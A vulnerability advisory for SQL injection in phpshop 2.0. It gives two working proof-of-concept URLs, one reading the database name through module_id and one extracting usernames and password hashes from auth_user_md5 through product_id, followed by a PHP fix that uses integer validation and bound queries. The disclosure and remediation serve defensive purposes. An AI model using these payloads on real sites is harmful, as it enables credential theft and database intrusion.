Title: phpshop 2.0 SQL Injection Vulnerability
Author: onestree
Download: http://code.google.com/p/phpshop/downloads/list
Tested on: Windows 7 / Ubuntu

SQLi PoC:
==================
http://www.xxx.com/phpshop 2.0/?page=admin/function_list&module_id=11' union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --

http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--

Fix:
Strengthen input filtering.
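
One way to apply the fix to the two ID parameters named in the PoC (module_id and product_id), as an added example that is not phpshop's own code: strict integer validation plus a bound query parameter. The `product` table, its columns, and the helper names `parse_id` and `find_product` are hypothetical; the demo data is constructed and lives in an in-memory SQLite database reached through PDO.

```php
<?php
// Added example: not phpshop's own code. Table and column names below are
// hypothetical stand-ins; only the parameter names come from the advisory.

/**
 * Accept an ID only if the whole value is a positive integer.
 * Returns the int, or null when the value must be rejected.
 */
function parse_id($raw): ?int
{
    if (!is_string($raw)) {          // arrays (?product_id[]=1) are rejected
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/** Look up a product with the ID bound as a parameter, never concatenated. */
function find_product(PDO $db, $rawId): ?array
{
    $id = parse_id($rawId);
    if ($id === null) {
        return null;                 // caller should answer 400/404
    }
    $stmt = $db->prepare('SELECT product_id, name FROM product WHERE product_id = ?');
    $stmt->bindValue(1, $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed demo data in an in-memory SQLite database (needs pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE product (product_id INTEGER PRIMARY KEY, name TEXT)');
$db->exec("INSERT INTO product VALUES (1087, 'sample item')");

// Constructed inputs: one valid ID and the two value shapes from the PoC.
$inputs = ['1087', "11' union select 1,database() --", "1087'/**/union/**/select/**/1"];
foreach ($inputs as $in) {
    $row = find_product($db, $in);
    printf("%-40s => %s\n", $in, $row ? $row['name'] : 'rejected');
}
```

Validation rejects anything that is not a whole integer before a query is built, and the bound parameter keeps the value out of the SQL text even if a validation step is later removed or bypassed.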